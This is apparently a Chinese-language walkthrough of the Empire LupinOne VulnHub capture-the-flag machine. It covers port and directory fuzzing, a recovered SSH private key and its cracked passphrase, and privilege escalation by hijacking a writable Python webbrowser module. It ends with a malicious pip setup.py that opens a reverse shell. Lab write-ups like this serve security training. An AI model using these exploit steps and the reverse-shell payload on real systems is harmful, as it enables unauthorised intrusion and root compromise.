kali攻击机ip :192.168.181.129
忘记打开nat模式了,用的桥接模式,懒得重启了,反正ip已经告诉我们了,那就先用着吧
端口扫描(有点慢)
nmap -sS -p 1-65535 -A 192.168.1.108
查看80端口
别放弃!
目录扫描
disallow,不信,我要看看
看看页面源代码,叫我们继续尝试
那就再扫扫这个目录
wfuzz --hw 31 -w /home/user/fuzzDicts-master/directoryDicts/Filenames_or_Directories_All.txt -u http://192.168.1.108/~myfiles/FUZZ
啥都没有
根目录也扫扫
wfuzz --hw 31 -w /home/user/fuzzDicts-master/directoryDicts/Filenames_or_Directories_All.txt -u http://192.168.1.108/FUZZ
啥都没有
难道要跟着这个~myfiles一样的格式?试试吧
wfuzz --hw 31 -w /home/user/fuzzDicts-master/directoryDicts/Filenames_or_Directories_All.txt -u http://192.168.1.108/~FUZZ
居然有了,这哥们有强迫症啊
~secret
有几个重点:
-
作者弄了一个ssh私钥文件,放在这里一个隐蔽的地方
-
crack passphrase with fasttrack
-
作者名叫icex4
先查查这个fasttrack是啥
一开始我还以为是个类似hydra的密码爆破的工具,后来发现这是kali自带的一个字典文件fasttrack.txt
想偷懒试试直接爆破ssh密码
果然没这么轻松=_=
再看看别的吧
回到ssh私钥,可能在这个url目录底下藏着
继续使用wfuzz模糊测试
先试试正常的小字典,.txt后缀
wfuzz --hw 31,28 -w /home/user/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt -u http://192.168.1.108/~secret/FUZZ.txt
不行
换个后缀也不行,.php,.html都试过了,都不行
不会是字典问题吧,可是大字典要跑好久好久=_=(而且wfuzz和dirbuster经常没跑完就停了,别问我怎么知道的)
不会这么为难人吧,应该是别的地方出问题了
提示里面说了个hidden,有点提醒到我了,难道这个私钥文件还是个.开头的隐藏文件?
wfuzz --hw 31 -w /home/user/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt -u http://192.168.1.108/~secret/.FUZZ.txt
终于,有一个.mysecret.txt
文件浮出水面
其实还有一个fuzz的工具也挺好用的,叫ffuf
,kali自带的。
ffuf可以一次性指定多个文件后缀爆破,不用像wfuzz和dirbuster一样要一个个试;而且我用大字典ffuf也能跑完,就是时间有点久,要有耐心
查看.mysecret.txt
可是一看就不对劲啊,私钥哪是长这样的,一般格式都是开头有个----- BENGIN xxx PRIVATE KEY-----,然后结尾就是-----END xxx PRIVATE KEY-----这样的吧
所以很大可能是编码过的
这个网站有各种密码的解码工具
一个一个试吧=_=,我是真看不出来这是啥编码方式
试出来了!是base58!确实没见过
这才像样嘛
-----BEGIN OPENSSH PRIVATE KEY-----
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
iUJ66WmRUN9EoVlkeCzQJwivI=
-----END OPENSSH PRIVATE KEY-----
写入文件
vim id_openssh
缩小密钥文件权限,不然会报错
chmod 600 id_openssh
还要密码,看来设置了私钥+密码登录ssh
使用john爆破密码
安全工具——John the Ripper - 先知社区 (aliyun.com)
如何使用开膛手约翰破解SSH私钥密码 « 空字节 :: WonderHowTo
john识别不了id_openssh,需要将密钥文件转换为john兼容的攻击文件
ssh2john /home/user/vulnhub_p_u/empire_lupinone/id_openssh > passwd.hash
john --wordlist=/usr/share/wordlists/fasttrack.txt /home/user/vulnhub_p_u/empire_lupinone/passwd.hash
P@55w0rd!
ssh icex64@192.168.1.108 -i id_openssh
既然有密码,那就查看一下suid权限命令
sudo -l
一个py文件,引入了webbrowser包,输出一句话,并且打开作者的网站
查看用户目录
cd /home
ls
cd arsene/
ls
发现了两个文件,其中一个就是sudo -l
发现的root权限命令
查看note.txt
你能帮忙检查我的代码是否可以安全运行吗,我需要用于我的下一次抢劫。
我不想让其他人进入它,因为它可能会危及我的帐户并找到我的秘密文件。
只有您可以访问我的程序,因为我知道您的帐户是安全的。
另一边见。
heist.py
root权限可读写
查看隐藏文件,secret欸
都没权限查看
回去icex64的目录查看
cd icex64
cat user.txt
一顶帅气的帽子,还有一行字符串
3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}
可能是密码?
不是arsene的登录密码
查看隐藏目录,查看bash日志,发现icex64登录过root想尝试刚刚的密码是不是root密码
cat .bash_history
想尝试刚刚的密码是不是root密码
好吧也不是
有点懵逼,信息收集的差不多了,但是感觉无从下手
只能回去看看刚刚的信息还有什么没用上
遗漏了这个webbrowser包,一开始就发现了,但没有深入查看
查找webbrowser包路径
webbrowser.py
拥有好高的权限,普通用户都可以写入,那我就不客气了
cat webbrowser.py
因为heist.py脚本中调用了webbrowser.open(),所以我选择在open函数里面插入os.system("/bin/sh")
提权命令;当heist.py执行open()时,就能切换到arsene用户的shell
因为是利用arsene权限执行,所以要写成sudo - u arsene
sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
弄个回显 python3 -c 'import pty;pty.spawn("/bin/bash")'\;
第一时间去看.secret,虽然不知道有啥用
rQ8EE"UK,eV)weg~nd-`5:{"j7*Q
sudo -l
可以以root身份执行pip
pip提权
在执行pip install时会调用setup.py,可以在本地创建恶意setup.py文件来达到任意命令执行的效果
写入py脚本,我是直接在/home目录下新建文件的,别的地方没试过,不知道行不行
cd /home
touch setup.py
vi setup.py
from setuptools import setup
from setuptools.command.install import install
import os, socket, subprocess
class CustomInstall(install):
def run(self):
install.run(self)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
setup(name='FakePip',
version='0.0.1',
description='Reverse shell',
url='xx.xx.xx.xx',
author='nathan',
author_email='xx@xx',
license='MIT',
zip_safe=False,
cmdclass={'install': CustomInstall})
kali打开nc监听1234端口
使用命令强制pip重新安装当前版本
sudo pip install . --upgrade --force-reinstall
连上了,获得root权限
获得flag,不过这个3mp!r3到底是啥玩意啊??!!!!
o了 😃